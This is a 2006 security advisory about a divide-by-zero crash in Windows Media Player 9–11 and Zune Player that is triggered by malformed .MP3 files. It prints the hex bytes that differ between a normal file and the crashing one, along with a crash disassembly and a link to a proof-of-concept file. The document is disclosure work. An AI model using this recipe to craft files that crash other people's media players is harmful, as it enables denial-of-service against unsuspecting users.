Windows Media Player 11 .MP3 Divide By Zero DoS


Windows Media Player 11 .MP3 Divide By Zero DoS
Release Date:
November 21st, 2006

Severity:
Low

Vendor:
Microsoft

Versions Affected:
Windows Media Player 11
Windows Media Player 10
Windows Media Player 9
Zune Player 1.0.5341.0

Platforms Affected:
Windows XP SP2
Windows Vista

Overview:
A divide by zero flaw exists within Windows Media Player 11, and all prior versions which allows for an attacker to send a user a specially crafted .MP3 file causing the application to crash.

Technical Details:
The l3codeca.acm (version 1.9.0.305) codec does not properly handle malformed .mp3 files. Below are the differences between the source file, and the malformed file:

Source File

52 49 46 46 BE 74 05 00 57 41 56 45 66 6D 74 20
1E 00 00 00 55 00 02 00 C0 5D 00 00 58 1B 00 00

Modified File

52 49 46 46 BE 74 05 00 57 41 56 45 66 6D 74 20
1E 00 00 00 55 00 02 00 AA AA AA AA 58 1B 00 00


Below is the crash triggered on Windows XP SP2 using Windows Media Player 11.0.5705.5043

58392AD2 F7F1 DIV ECX <(=- We Crash Here
58392AD4 33D2 XOR EDX,EDX
58392AD6 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
58392ADA 8BC7 MOV EAX,EDI
58392ADC F7F1 DIV ECX
58392ADE 85D2 TEST EDX,EDX
58392AE0 74 04 JE SHORT l3codeca.58392AE6


EAX 000003F0
ECX 00000000
EDX 00000000
EBX 00000480
ESP 03FDFB38
EBP 03FDFBDC
ESI 04384DA2
EDI 000003F0

EIP 58392AD2 l3codeca.58392AD2

Vendor Status:
Vendor was notified.

Solution:
Dont open untrusted .MP3 files, or use another media player.

Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com

Related Links:
http://security-protocols.com/poc/sp-x35.mp3
http://security-protocols.com/sp-x35-advisory.php
http://microsoft.com/windows/windowsmedia/default.mspx

2006 Security-Protocols, LLC